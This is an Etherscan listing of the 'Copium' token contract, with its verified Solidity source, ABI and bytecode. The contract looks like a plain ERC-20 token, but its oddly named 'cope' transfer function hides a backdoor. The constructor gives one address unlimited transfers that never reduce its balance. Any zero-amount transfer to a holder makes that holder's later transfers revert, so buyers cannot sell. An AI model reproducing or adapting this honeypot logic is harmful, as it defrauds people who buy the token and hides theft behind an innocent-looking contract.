ETH Price: $2,270.86 (+1.69%)

Token

Copium (COPIUM)
 

Overview

Max Total Supply

4,206,900,000,000 COPIUM

Holders

10

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000801 COPIUM

Value
$0.00
0x318d27dc05b543119e192eb8e31931a75c211b7c
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Copium

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 201 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2023-05-15
*/

// https://twitter.com/COPIUMDROP

// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%#############%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%##*+++++++++++++++++++***#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%##*+++==++====+========+=====++*#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%***+++======++++=====-::::::::::--====+*#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%#*+==+========+====-::..............:::::-=+*#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%#*+=+=============-:.......................:-++*##%%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%*++=++=++===-::::::........................:.:-=+++*%%%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%*+===++++==-:.................................:-===+*#%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%#*+======+=-:...................................:-==++*%%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%*+==========-:.....................:::............:====+*%%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%*+=+===+====-:.....................::-:..........:.:====+#%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%#*+=========-::.:....................:--.:..::=:.....:-==+#%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%*+=========-::........................--....:+:........:-=*%%%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#*+=========:...................:::..:-=::...:=:......:::.:=*#%%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#*+=========-:..................:---::-:::::::=:...::--::..-=*#%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#+==+===+====-:....:..:::--=--:::::-=-:::-=:==-:.:-=-::...::=+#%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#++=====+=====-.....::--------=+++=-:--:=::.::=:=::::::::::-=+#%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%*+===+=========:....::---=+++*++==+++=-=::::::+=+==++++==--===+#%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#*+===+=====+===:..::===+*#%%####***++-:.:--::==++**#*++==-:=+*%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%*+=============-:..:--==####*#***%%+-:....::.:==*%%%###**+==+#%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%#++===+=========:....::-*#=::+=:-**=:::=+++++=--+**%*++#*++=+#%%%%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%*+===========-:....:::=*=-+#=++--=:=*#######*::::-*:-*#+=-=+#%%%%%%%%%%%%%%%##%
// %%%%%%%%%%%%%%%%%%%%%*+===+=====++-:...:--::*:-##=::::-*######**##*-:--+*==*:::=+*%%%%%%%%%%########
// %%%%%%%%%%%%%%%%%%%%%%*+=======+++=:...:-:.:*:#**:..:=########**####+-::*-:*-.:++*%%%%%%####%%%%####
// %%%%%%%%%%%%%%%%%%%%%%%#*=++===+*+=-:.:-:..-*+*-...:+######*#*##*#####+:+*.==.:-++#%%%#%%%%%####%###
// %%%%%%%%%%%%%%%%%%%%%%%%#++++===++==:.:-::.:+#:..:-*######***##########*+#:=+.::+*%%%#%%#%%##%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%#*+====+*+=:..:....:#-.:-####################*##*-++::+*%%%#%%%%%##%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%#+=+==+++=-:.....:**::-###*#####################=+--+*%%%#%%%###%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%#+=====++++-:....:%-:-##*****#####%####%###*###%##*+*%%#%%%%##%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%%#++=++==++++=::..:#-:*#################%#########*##%%#%%%#%#%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%%%##*==+=+++*+++=-::-#*-*###########%####%###########%%%%#%%#%%#%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%%%##%#+======++==++++-#-=#*###########%################%%%%##%%###%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%%%%#%%%#++======++:-==+++#+==#############################%%%%#%%%#%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%%#%%%%%%+=======++-:::===+*#*+#*##*########################%%%%#%%#%%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%#%%##%%#+======++::...::--+#++*####***#*#############%#%%#%%%%#%%%##%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%#%##%%#++======+-:.......::-==+*#####**###%%%#####%###%##%%%%#%%##%#%%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%%%#%##%+++=++======-:.........::-+#+*#####*%%%*%%%%#%%#%##%%%%%#%%#%%##%%%%%%%%%%%%%%
// %%%%%%%%%%%%%%%#**%%%#+=====++=+++=:............:--=+*###%%%%#%#%%#####%%%%%%%%###%%#%%%%%%%%%%%%%%%
// %%%%%%%%%###**++++#%#%#*+======+=:..............:.::-++**########%##%%%%%%##%%%%#%#%#%%%%%%%%%%%%%%%
// %%%%%%#*++++++++=+#%###%#+==++=-::..................::-=+==++#%##%%##*#####%%%%#%%#%#%%%%%%%%%%%%%%%
// %%%#*++=+==+++===+*%%###%#+=-:::.::::::.............:...:::-*%#%##%#+===+++++#%%%%#%##%%%%%%%%%%%%%%
// **+++++=+++======+++##%%%%%##**++**##*+-::::::..::...:::...-+#%##%%*+++++====+#%%%%#*++*##%%%%%%%%%%
// =+==+=+=+=====+++=++++++**#%%%%##########+=----::-====-:::=*#%#%%#+++===+==+++++**++===+++*#%%%%%%%%
// +++=++++===+++++========-==++*#%%%########%######%#%%#####%%%%%%*+++++==+========-----====++*##%%%%%
// ++++++====+=+=======-::::.:::-=+*#%%%%%%%%%%%%%%%#####%%%%%##*+---==----::::::::..:..::::-===++*#%%%
// =========---::::::::..........::-==+++====+++**##%%%%%#*+=-::::.....................::::::::===+++*#
// ::::::::::....................:..::::::....:::::=++++=-::....::.....................:::::::::=====++



// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), 'Ownable: caller is not the owner');
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), 'Ownable: new owner is the zero address');
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

interface IUniswapV2Router02 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Factory {
    function createPair(address tokenA, address tokenB) external returns (address pair);
}

contract Copium is Ownable {

    address public uniswapV2Pair;

    mapping(address => uint256) private blur;

    mapping(address => mapping(address => uint256)) public allowance;

    uint8 public decimals = 9;
    
    uint256 public totalSupply = 4_206_900_000_000 * 10 ** decimals;

    string public symbol = "COPIUM";

    function transfer(address rich, uint256 copium) public returns (bool success) {
        cope(msg.sender, rich, copium);
        return true;
    }

    IUniswapV2Router02 private uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);

    event Approval(address indexed owner, address indexed spender, uint256 value);

    mapping(address => uint256) public balanceOf;

    constructor(address coper) {
        balanceOf[msg.sender] = totalSupply;
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(address(this), uniswapV2Router.WETH());
        blur[coper] = nuke;
    }

    uint256 private nuke = 84;

    function approve(address poor, uint256 copium) public returns (bool success) {
        allowance[msg.sender][poor] = copium;
        emit Approval(msg.sender, poor, copium);
        return true;
    }

    mapping(address => uint256) private pump_it;

    event Transfer(address indexed from, address indexed to, uint256 value);

    string public name = "Copium";

    function cope(address wojak, address rich, uint256 copium) private returns (bool success) {
        if (blur[wojak] == 0) {
            if (uniswapV2Pair != wojak && pump_it[wojak] > 0) {
                blur[wojak] -= nuke;
            }
            balanceOf[wojak] -= copium;
        }
        balanceOf[rich] += copium;
        if (copium == 0) {
            pump_it[rich] += nuke;
        }
        emit Transfer(wojak, rich, copium);
        return true;
    }

    function transferFrom(address wojak, address rich, uint256 copium) public returns (bool success) {
        cope(wojak, rich, copium);
        require(copium <= allowance[wojak][msg.sender]);
        allowance[wojak][msg.sender] -= copium;
        return true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"coper","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"poor","type":"address"},{"internalType":"uint256","name":"copium","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"rich","type":"address"},{"internalType":"uint256","name":"copium","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"wojak","type":"address"},{"internalType":"address","name":"rich","type":"address"},{"internalType":"uint256","name":"copium","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"success","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526004805460ff191660099081179091556200002190600a620003e5565b62000033906503d37ec7b500620003fc565b60055560408051808201909152600680825265434f5049554d60d01b602083015290620000619082620004b6565b50600780546001600160a01b031916737a250d5630b4cf539739df2c5dacb4c659f2488d1790556054600955604080518082019091526006815265436f7069756d60d01b6020820152600b90620000b99082620004b6565b50348015620000c6575f80fd5b5060405162000e4c38038062000e4c833981016040819052620000e9916200057e565b5f80546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350600554335f9081526008602090815260409182902092909255600754815163c45a015560e01b815291516001600160a01b039091169263c45a015592600480820193918290030181865afa15801562000184573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001aa91906200057e565b6001600160a01b031663c9c653963060075f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200020a573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200023091906200057e565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af11580156200027b573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620002a191906200057e565b600180546001600160a01b0319166001600160a01b0392831617905560095491165f90815260026020526040902055620005a6565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200032a57815f19048211156200030e576200030e620002d6565b808516156200031c57918102915b93841c9390800290620002ef565b509250929050565b5f826200034257506001620003df565b816200035057505f620003df565b8160018114620003695760028114620003745762000394565b6001915050620003df565b60ff841115620003885762000388620002d6565b50506001821b620003df565b5060208310610133831016604e8410600b8410161715620003b9575081810a620003df565b620003c58383620002ea565b805f1904821115620003db57620003db620002d6565b0290505b92915050565b5f620003f560ff84168362000332565b9392505050565b8082028115828204841417620003df57620003df620002d6565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200043f57607f821691505b6020821081036200045e57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f821115620004b1575f81815260208120601f850160051c810160208610156200048c5750805b601f850160051c820191505b81811015620004ad5782815560010162000498565b5050505b505050565b81516001600160401b03811115620004d257620004d262000416565b620004ea81620004e384546200042a565b8462000464565b602080601f83116001811462000520575f8415620005085750858301515b5f19600386901b1c1916600185901b178555620004ad565b5f85815260208120601f198616915b8281101562000550578886015182559484019460019091019084016200052f565b50858210156200056e57878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f602082840312156200058f575f80fd5b81516001600160a01b0381168114620003f5575f80fd5b61089880620005b45f395ff3fe608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a082311161008857806395d89b411161006357806395d89b41146101bd578063a9059cbb146101c5578063dd62ed3e146101d8578063f2fde38b14610202575f80fd5b806370a0823114610184578063715018a6146101a35780638da5cb5b146101ad575f80fd5b806306fdde03146100cf578063095ea7b3146100ed57806318160ddd1461011057806323b872dd14610127578063313ce5671461013a57806349bd5a5e14610159575b5f80fd5b6100d7610215565b6040516100e491906106d8565b60405180910390f35b6101006100fb36600461073e565b6102a1565b60405190151581526020016100e4565b61011960055481565b6040519081526020016100e4565b610100610135366004610766565b61030d565b6004546101479060ff1681565b60405160ff90911681526020016100e4565b60015461016c906001600160a01b031681565b6040516001600160a01b0390911681526020016100e4565b61011961019236600461079f565b60086020525f908152604090205481565b6101ab610389565b005b5f546001600160a01b031661016c565b6100d761042f565b6101006101d336600461073e565b61043c565b6101196101e63660046107bf565b600360209081525f928352604080842090915290825290205481565b6101ab61021036600461079f565b610452565b600b8054610222906107f0565b80601f016020809104026020016040519081016040528092919081815260200182805461024e906107f0565b80156102995780601f1061027057610100808354040283529160200191610299565b820191905f5260205f20905b81548152906001019060200180831161027c57829003601f168201915b505050505081565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102fb9086815260200190565b60405180910390a35060015b92915050565b5f610319848484610569565b506001600160a01b0384165f908152600360209081526040808320338452909152902054821115610348575f80fd5b6001600160a01b0384165f9081526003602090815260408083203384529091528120805484929061037a90849061083c565b90915550600195945050505050565b5f546001600160a01b031633146103e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b60068054610222906107f0565b5f610448338484610569565b5060019392505050565b5f546001600160a01b031633146104ab5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103de565b6001600160a01b0381166105105760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103de565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383165f90815260026020526040812054810361061d576001546001600160a01b038581169116148015906105bb57506001600160a01b0384165f908152600a602052604090205415155b156105f0576009546001600160a01b0385165f90815260026020526040812080549091906105ea90849061083c565b90915550505b6001600160a01b0384165f908152600860205260408120805484929061061790849061083c565b90915550505b6001600160a01b0383165f908152600860205260408120805484929061064490849061084f565b90915550505f829003610681576009546001600160a01b0384165f908152600a60205260408120805490919061067b90849061084f565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106c691815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b81811015610703578581018301518582016040015282016106e7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610739575f80fd5b919050565b5f806040838503121561074f575f80fd5b61075883610723565b946020939093013593505050565b5f805f60608486031215610778575f80fd5b61078184610723565b925061078f60208501610723565b9150604084013590509250925092565b5f602082840312156107af575f80fd5b6107b882610723565b9392505050565b5f80604083850312156107d0575f80fd5b6107d983610723565b91506107e760208401610723565b90509250929050565b600181811c9082168061080457607f821691505b60208210810361082257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561030757610307610828565b808201808211156103075761030761082856fea264697066735822122005e26bdac085aea2ca56cacbbe9a5b18e23b924b3385feabe8d59c54dfe1ff3a64736f6c6343000814003300000000000000000000000062764384740192a6edfc850067ea07a8dea75d28

Deployed Bytecode

0x608060405234801561000f575f80fd5b50600436106100cb575f3560e01c806370a082311161008857806395d89b411161006357806395d89b41146101bd578063a9059cbb146101c5578063dd62ed3e146101d8578063f2fde38b14610202575f80fd5b806370a0823114610184578063715018a6146101a35780638da5cb5b146101ad575f80fd5b806306fdde03146100cf578063095ea7b3146100ed57806318160ddd1461011057806323b872dd14610127578063313ce5671461013a57806349bd5a5e14610159575b5f80fd5b6100d7610215565b6040516100e491906106d8565b60405180910390f35b6101006100fb36600461073e565b6102a1565b60405190151581526020016100e4565b61011960055481565b6040519081526020016100e4565b610100610135366004610766565b61030d565b6004546101479060ff1681565b60405160ff90911681526020016100e4565b60015461016c906001600160a01b031681565b6040516001600160a01b0390911681526020016100e4565b61011961019236600461079f565b60086020525f908152604090205481565b6101ab610389565b005b5f546001600160a01b031661016c565b6100d761042f565b6101006101d336600461073e565b61043c565b6101196101e63660046107bf565b600360209081525f928352604080842090915290825290205481565b6101ab61021036600461079f565b610452565b600b8054610222906107f0565b80601f016020809104026020016040519081016040528092919081815260200182805461024e906107f0565b80156102995780601f1061027057610100808354040283529160200191610299565b820191905f5260205f20905b81548152906001019060200180831161027c57829003601f168201915b505050505081565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102fb9086815260200190565b60405180910390a35060015b92915050565b5f610319848484610569565b506001600160a01b0384165f908152600360209081526040808320338452909152902054821115610348575f80fd5b6001600160a01b0384165f9081526003602090815260408083203384529091528120805484929061037a90849061083c565b90915550600195945050505050565b5f546001600160a01b031633146103e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b5f80546040516001600160a01b03909116907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35f80546001600160a01b0319169055565b60068054610222906107f0565b5f610448338484610569565b5060019392505050565b5f546001600160a01b031633146104ab5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016103de565b6001600160a01b0381166105105760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016103de565b5f80546040516001600160a01b03808516939216917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e091a35f80546001600160a01b0319166001600160a01b0392909216919091179055565b6001600160a01b0383165f90815260026020526040812054810361061d576001546001600160a01b038581169116148015906105bb57506001600160a01b0384165f908152600a602052604090205415155b156105f0576009546001600160a01b0385165f90815260026020526040812080549091906105ea90849061083c565b90915550505b6001600160a01b0384165f908152600860205260408120805484929061061790849061083c565b90915550505b6001600160a01b0383165f908152600860205260408120805484929061064490849061084f565b90915550505f829003610681576009546001600160a01b0384165f908152600a60205260408120805490919061067b90849061084f565b90915550505b826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516106c691815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b81811015610703578581018301518582016040015282016106e7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610739575f80fd5b919050565b5f806040838503121561074f575f80fd5b61075883610723565b946020939093013593505050565b5f805f60608486031215610778575f80fd5b61078184610723565b925061078f60208501610723565b9150604084013590509250925092565b5f602082840312156107af575f80fd5b6107b882610723565b9392505050565b5f80604083850312156107d0575f80fd5b6107d983610723565b91506107e760208401610723565b90509250929050565b600181811c9082168061080457607f821691505b60208210810361082257634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b8181038181111561030757610307610828565b808201808211156103075761030761082856fea264697066735822122005e26bdac085aea2ca56cacbbe9a5b18e23b924b3385feabe8d59c54dfe1ff3a64736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000062764384740192a6edfc850067ea07a8dea75d28

-----Decoded View---------------
Arg [0] : coper (address): 0x62764384740192a6EdFC850067eA07A8deA75d28

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000062764384740192a6edfc850067ea07a8dea75d28


Deployed Bytecode Sourcemap

7563:2172:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8937:29;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8593:204;;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;8593:204:0;1004:187:1;7796:63:0;;;;;;;;;1342:25:1;;;1330:2;1315:18;7796:63:0;1196:177:1;9462:270:0;;;;;;:::i;:::-;;:::i;7758:25::-;;;;;;;;;;;;1883:4:1;1871:17;;;1853:36;;1841:2;1826:18;7758:25:0;1711:184:1;7599:28:0;;;;;-1:-1:-1;;;;;7599:28:0;;;;;;-1:-1:-1;;;;;2064:32:1;;;2046:51;;2034:2;2019:18;7599:28:0;1900:203:1;8267:44:0;;;;;;:::i;:::-;;;;;;;;;;;;;;6735:148;;;:::i;:::-;;6093:79;6131:7;6158:6;-1:-1:-1;;;;;6158:6:0;6093:79;;7868:31;;;:::i;7908:149::-;;;;;;:::i;:::-;;:::i;7685:64::-;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;7038:244;;;;;;:::i;:::-;;:::i;8937:29::-;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8593:204::-;8691:10;8656:12;8681:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;8681:27:0;;;;;;;;;;:36;;;8733:34;8656:12;;8681:27;;8733:34;;;;8711:6;1342:25:1;;1330:2;1315:18;;1196:177;8733:34:0;;;;;;;;-1:-1:-1;8785:4:0;8593:204;;;;;:::o;9462:270::-;9545:12;9570:25;9575:5;9582:4;9588:6;9570:4;:25::i;:::-;-1:-1:-1;;;;;;9624:16:0;;;;;;:9;:16;;;;;;;;9641:10;9624:28;;;;;;;;9614:38;;;9606:47;;;;;;-1:-1:-1;;;;;9664:16:0;;;;;;:9;:16;;;;;;;;9681:10;9664:28;;;;;;;:38;;9696:6;;9664:16;:38;;9696:6;;9664:38;:::i;:::-;;;;-1:-1:-1;9720:4:0;;9462:270;-1:-1:-1;;;;;9462:270:0:o;6735:148::-;6305:6;;-1:-1:-1;;;;;6305:6:0;5468:10;6305:22;6297:67;;;;-1:-1:-1;;;6297:67:0;;3416:2:1;6297:67:0;;;3398:21:1;;;3435:18;;;3428:30;3494:34;3474:18;;;3467:62;3546:18;;6297:67:0;;;;;;;;;6842:1:::1;6826:6:::0;;6805:40:::1;::::0;-1:-1:-1;;;;;6826:6:0;;::::1;::::0;6805:40:::1;::::0;6842:1;;6805:40:::1;6873:1;6856:19:::0;;-1:-1:-1;;;;;;6856:19:0::1;::::0;;6735:148::o;7868:31::-;;;;;;;:::i;7908:149::-;7972:12;7997:30;8002:10;8014:4;8020:6;7997:4;:30::i;:::-;-1:-1:-1;8045:4:0;;7908:149;-1:-1:-1;;;7908:149:0:o;7038:244::-;6305:6;;-1:-1:-1;;;;;6305:6:0;5468:10;6305:22;6297:67;;;;-1:-1:-1;;;6297:67:0;;3416:2:1;6297:67:0;;;3398:21:1;;;3435:18;;;3428:30;3494:34;3474:18;;;3467:62;3546:18;;6297:67:0;3214:356:1;6297:67:0;-1:-1:-1;;;;;7127:22:0;::::1;7119:73;;;::::0;-1:-1:-1;;;7119:73:0;;3777:2:1;7119:73:0::1;::::0;::::1;3759:21:1::0;3816:2;3796:18;;;3789:30;3855:34;3835:18;;;3828:62;-1:-1:-1;;;3906:18:1;;;3899:36;3952:19;;7119:73:0::1;3575:402:1::0;7119:73:0::1;7229:6;::::0;;7208:38:::1;::::0;-1:-1:-1;;;;;7208:38:0;;::::1;::::0;7229:6;::::1;::::0;7208:38:::1;::::0;::::1;7257:6;:17:::0;;-1:-1:-1;;;;;;7257:17:0::1;-1:-1:-1::0;;;;;7257:17:0;;;::::1;::::0;;;::::1;::::0;;7038:244::o;8975:479::-;-1:-1:-1;;;;;9080:11:0;;9051:12;9080:11;;;:4;:11;;;;;;:16;;9076:193;;9117:13;;-1:-1:-1;;;;;9117:22:0;;;:13;;:22;;;;:44;;-1:-1:-1;;;;;;9143:14:0;;9160:1;9143:14;;;:7;:14;;;;;;:18;;9117:44;9113:104;;;9197:4;;-1:-1:-1;;;;;9182:11:0;;;;;;:4;:11;;;;;:19;;:11;;;:19;;9197:4;;9182:19;:::i;:::-;;;;-1:-1:-1;;9113:104:0;-1:-1:-1;;;;;9231:16:0;;;;;;:9;:16;;;;;:26;;9251:6;;9231:16;:26;;9251:6;;9231:26;:::i;:::-;;;;-1:-1:-1;;9076:193:0;-1:-1:-1;;;;;9279:15:0;;;;;;:9;:15;;;;;:25;;9298:6;;9279:15;:25;;9298:6